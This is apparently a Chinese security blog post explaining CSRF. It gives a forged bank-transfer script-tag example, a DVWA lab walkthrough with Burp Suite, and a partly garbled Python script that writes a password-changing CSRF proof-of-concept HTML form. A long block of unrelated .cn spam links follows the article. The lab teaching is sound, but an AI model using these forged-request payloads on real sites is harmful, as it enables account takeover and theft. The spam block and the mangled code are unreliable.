浅谈CSRF漏洞

最新推荐文章于 2024-07-28 21:35:23 发布
最新推荐文章于 2024-07-28 21:35:23 发布
阅读量349 收藏
点赞数
正文:
CSRF与xss和像,但是两个是完全不一样的东西。
xss攻击(跨站脚本攻击)储存型的XSS由攻击者和受害者一同完成。xss详细介绍: 点我跳转
 
CSRF(跨站脚本伪造)完全由受害者完成。攻击者不参与其中。CSRF详细介绍: 点我跳转
 
CSRF原理:
 
银行转账的数据包:http://jianse.com/zhuanzhang.php?name=lu&email=xxx@qq.com&monet=1000
攻击者的博客:http://www.hack.com/index,php
把这个加入到js里面。<script src=" http://jianse.com/zhuanzhang.php?name=lu&email= xxx@qq.com&monet=1000"></script>将这条代码计入到攻击者的博客。如果受害者登录了银行。而Session又没有过期,后而访问了攻击者的博客。当攻击者的博客加载好了js代码。受害者就会打了1000元给攻击者。
 

 

实验:
这里我使用DVWA来做使CSRF漏洞实现。攻击步骤如下:
首先登录DVWA,来到CSRF这里。 注:这里我的防御等级为low

 

启动Burpsuite,设置代理。

 

回到刚刚的页面,输入要更改的密码。burp开启抓包
 

 

抓到的包

 

构造CSRF POC

 

更改所需要的

 

点击Regenerate按钮更新POC,点击Test in browser复制链接

 

点击Copy按钮。复制到浏览器上使用

 

点击按钮实行csrf攻击。

 

从图中我们可以看到密码已经更改,退回登录界面。

 

点击登录

 

从图中我们可以看到,CSRF攻击已经成功实施。
既然如此我们为什么不写一个CSRF脚本呢?
代码如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
import  time
import  simplejson as json
def  poc():
     url = "http://a2fae7a7.ngrok.io/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change"
     headers = { 'User-Agent' 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36' }
     values = url.split( '?' )[ - 1 ]
     urltwo = url.split( '?' )[: - 1 ]
     urltwos = "".join(urltwo)
     dumps = {}
     for  line  in  values.split( '&' ):
         key,value = line.split( '=' , 1 )
         dumps[key] = value
         discts = [i  for  in  dumps.keys()]
     print ( '原url:' ,url)
     print ( 'url原带的参数:' ,dumps)
     dumps[ 'password_new' =  'password'
     dumps[ 'password_conf' =  'password'
     valueswto = [g  for  in   dumps.values()]
     print ( 'url更该后的参数' ,dumps)
     print ( '1.burpsuite的POC' )
 
 
     user = input ( '请进行你的选择:' )
     if  user  = =  '1' :
         print ( 'burpsiuite的POC' )
         burp = open ( 'burp.html' , 'w' )
         burp.write( '<html>\n' )
         burp.write( '<body>\n' )
         burp.write( '<script>history.pushState("' '","' '",' "'/'" ')</script>\n' )
         burp.write( '<form action="{}">\n' . format (urltwos))
         burp.write( '<input type="hidden" name="{}" value="{}"/>\n' . format (discts[ 0 ],valueswto[ 0 ]))
         burp.write( '<input type="hidden" name="{}" value="{}"/>\n' . format (discts[ 1 ],valueswto[ 1 ]))
         burp.write( '<input type="hidden" name="{}" value="{}"/>\n' . format (discts[ 2 ],valueswto[ 2 ]))
         burp.write( '<input type="submit" value="Submit CSRF POC"/>\n' )
         burp.write( '</form>\n' )
         burp.write( '</body>\n' )
         burp.write( '</html>\n' )
         burp.close()
     else :
         print ( '【-】抱歉你没有进行选择,退出ing...' )
         time.sleep( 1 )
         exit()
 
 
 
poc()

  测试结果如下:

生成的html

打开burp.html

 

 点击按钮

密码更改成功。

http://www.wll1115.cn
http://www.rol3427.cn
http://www.akb6775.cn
http://www.giy4971.cn
http://www.tyo9948.cn
http://www.uzh3227.cn
http://www.mfc7569.cn
http://www.otm3953.cn
http://www.ewh1005.cn
http://www.iip1291.cn
http://www.dyg4913.cn
http://www.ase4727.cn
http://www.uqx4260.cn
http://www.sif0574.cn
http://www.sdb0307.cn
http://www.thg4282.cn
http://www.rvc0755.cn
http://www.qld9407.cn
http://www.idd5091.cn
http://www.cqu4082.cn
http://www.skk3561.cn
http://www.lsz6488.cn
http://www.ncc8754.cn
http://www.tsx6039.cn
http://www.ayr4754.cn
http://www.cjd7774.cn
http://www.wzf9854.cn
http://www.nzl1119.cn
http://www.zdn2144.cn
http://www.ief1694.cn
http://www.buu7798.cn
http://www.eig6365.cn
http://www.djf2649.cn
http://www.hvc6084.cn
http://www.opg6486.cn
http://www.hud3144.cn
http://www.iit3286.cn
http://www.wyu4949.cn
http://www.lus6696.cn
http://www.epi0997.cn
http://www.rdk6709.cn
http://www.lwa7903.cn
http://www.kjx4882.cn
http://www.nwf3326.cn
http://www.thy6127.cn
http://www.xho5322.cn
http://www.bfc2814.cn
http://www.lhl7110.cn
http://www.kpx1618.cn
http://www.prl0026.cn
http://www.bxb7451.cn
http://www.ube1531.cn
http://www.qnu9925.cn
http://www.hxl6493.cn
http://www.ric5056.cn
http://www.ibs2142.cn
http://www.mco2769.cn
http://www.tzr5175.cn

kkfd1002
关注
CSRF漏洞
qq_39416206的博客
03-14 804
知识点: CSRF原理: CSRF即跨站请求攻击。简单的说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己以前认证过的站点并运行一些操作(如发邮件,发消息,甚至财产操作(如转账和购买商品))。因为浏览器之前认证过,所以被访问的站点会绝点是这是真正的用户操作而去运行。 这就利用了web中用户身份认证验证的一个漏洞:简单的身份验证仅仅能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。 其实可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事
浅谈CSRF和SSRF
xdjxi的博客
03-28 4505
CSRF(跨站请求伪造) CSRF原理 1.有一个漏洞存在(无需验证、任意修改后台数据、新增请求); 2.伪装数据操作请求的恶意链接或者页面; 3.诱使用户主动访问或登录恶意链接,触发非法操作; 产生的条件 1.需要目标站点或系统存在一个可以进行数据修改或者新增操作,此操作被提交后台后的过程中,其未提供任何身份识别或校验的参数 2.后台只要收到请求,就立即下发数据修改或新增的操作 漏洞的危害 1.用户密码的修改 2.购物地址的修改 3.后台管理账户的新增 防御方法 1.验证 HTT
CSRF(跨站请求伪造)漏洞介绍
最新发布
weixin_56233402的博客
07-28 885
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。很多人搞不清楚CSRF的概念,甚至有时候会将其和XSS混淆,更有甚者会将其和越权问题混为一谈,这都是对原理没搞清楚导致的。
csrf漏洞
niqiu320的博客
04-22 213
什么是csrf? csrf跨站请求伪造,也被称为one-click attack 或者 session riding ,通常 缩写为CSRF或者XSRF,是一种挟持用户在当前已登录的WEB应用程序上执行 非本意的操作的攻击方法。 跟跨网站脚本(XSS)相比,XSS利用的是用户对指定网站的信任,CSRF利用的是网站对用户网页浏览器的信任。最大的区别就是CSRF没有盗取用户的cookie,而是直接的利用了浏览器存储的cookie让用户去执行某个动作。 例如:http://www.xx.com/pay.php?u
浅谈CSRF攻击方式
03-09
### 浅谈CSRF攻击方式 #### 一、CSRF是什么? CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的网络攻击手段,它利用用户在浏览器中保存的有效凭证(如Cookie等),通过伪装成受害者的身份对目标...
一起学习Django框架(十)Django中间件;浅谈CSRF_TOKEN
Simple子夜
04-18 1418
目录Django中间件(MiddleWare)一、什么是中间件二、中间件的作用三、自定义中间件3.1 process_request与process_response方法3.2 process_view方法3.3 process_exception3.4 process_template_responseCSRF_TOKEN一、CSRF是什么二、CSRF攻击原理三、CSRF攻击防范 Django中间件(MiddleWare) 中间件本身是一个很大的范围,比如:数据库中间件、服务器中间件、消息队列中间件等等
浅谈CSRF与SSRF
热门推荐
pygain的博客
10-24 1万+
今天看在看《XSS跨站脚本攻击剖析与防御》的时候,里边提到了CSRF与SSRF,在网络查询了这部分的资料后,简单总结了下二者的关系与不同
浅谈ASP.NET MVC 防止跨站请求伪造(CSRF)攻击的实现方法
10-18
在*** MVC开发中,防范跨站请求伪造(Cross-Site Request Forgery,简称CSRF)攻击是一项重要的安全任务。CSRF攻击利用了网站对于用户浏览器的信任,诱使用户在已认证的状态下向受信任网站发送非预期的请求。攻击者...
csrf漏洞例子(html、css、JavaScript、php)
04-26
demo例子操作步骤 1、登录获取身份认证(这里用到session) 2、登录后点击跳转进入有漏洞的网站(这里模拟的是黑客发给受害者的地址) 3、点击跳转后是一个图片 注解:其中src的地址money.php是网站的转账接口 其中name是转给谁,money是转多少钱 一旦目标登录了网站访问了这个网页,就会利用session给jake转账100元 可以在目录下查看journal.txt查看转账日志//每刷新一次页面就会转一次账
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值